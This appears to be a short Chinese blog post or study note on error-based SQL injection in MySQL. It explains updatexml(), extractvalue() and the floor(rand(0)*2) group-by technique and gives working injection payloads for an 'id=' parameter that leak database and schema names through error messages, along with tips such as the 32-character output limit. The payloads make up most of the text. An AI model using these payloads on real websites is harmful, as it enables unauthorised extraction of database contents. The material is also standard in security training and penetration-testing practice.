sql报错注入

updatexml()

UPDATEXML (XML_document, XPath_string, new_value); 
第一个参数:XML_document是String格式,为XML文档对象的名称。
第二个参数:XPath_string (Xpath格式的字符串) ,如果不了解Xpath语法,可以在网上查找教程。 
第三个参数:new_value,String格式,替换查找到的符合条件的数据。
作用:改变文档中符合条件的节点的值。

undatexml(1,(查询语句),1)
比如查库名
id=1 and updatexml(1,concat(0x7e,(select group_concat(schema_name) from information_schema.schemata),0x7e),1)
或者
id=1 and updatexml(1,concat(1,(select(database()))),1)

注意:
0x7e就是~,可以用'~'代替
updatexml()查询的字符串长度最大为32

在这里插入图片描述


extractvalue()

extractvalue():从目标 XML 中返回包含所查询值的字符串。
EXTRACTVALUE (XML_document, XPath_string); 
第一个参数:XML_document是 String 格式,为 XML 文档对象的名称。
第二个参数:XPath_string ( Xpath 格式的字符串)
concat:返回结果为连接参数产生的字符串。

extractvalue(1,(查询语句))
查库名
id=1 and extractvalue(1,concat(0x7e,(select group_concat(schema_name) from information_schema.schemata),0x7e))

注意:
extractvalue()查询的字符串最大长度为32

在这里插入图片描述


floor(rand(0)*2)

select count(*),concat((查询语句),0x7e,floor(rand(0)*2)) as x from information_schema.schemata group by x
查库名
id=1 union select 1,count(*) ,concat((select database()),0x7e,floor(rand(0)*2)) as x from information_schema.columns group by x
在这里插入图片描述id=100 union select 1,count(*) ,concat((select group_concat(schema_name) from information_schema.schemata),0x7e,floor(rand(0)*2)) as x from information_schema.columns group by x
(不知道为啥这样写就不报错直接查出来了...)
在这里插入图片描述

在这里插入图片描述

by xiaolong


参考引用:
SQL 注入 报错注入


最后修改:2023 年 12 月 15 日
如果觉得我的文章对你有用,请随意赞赏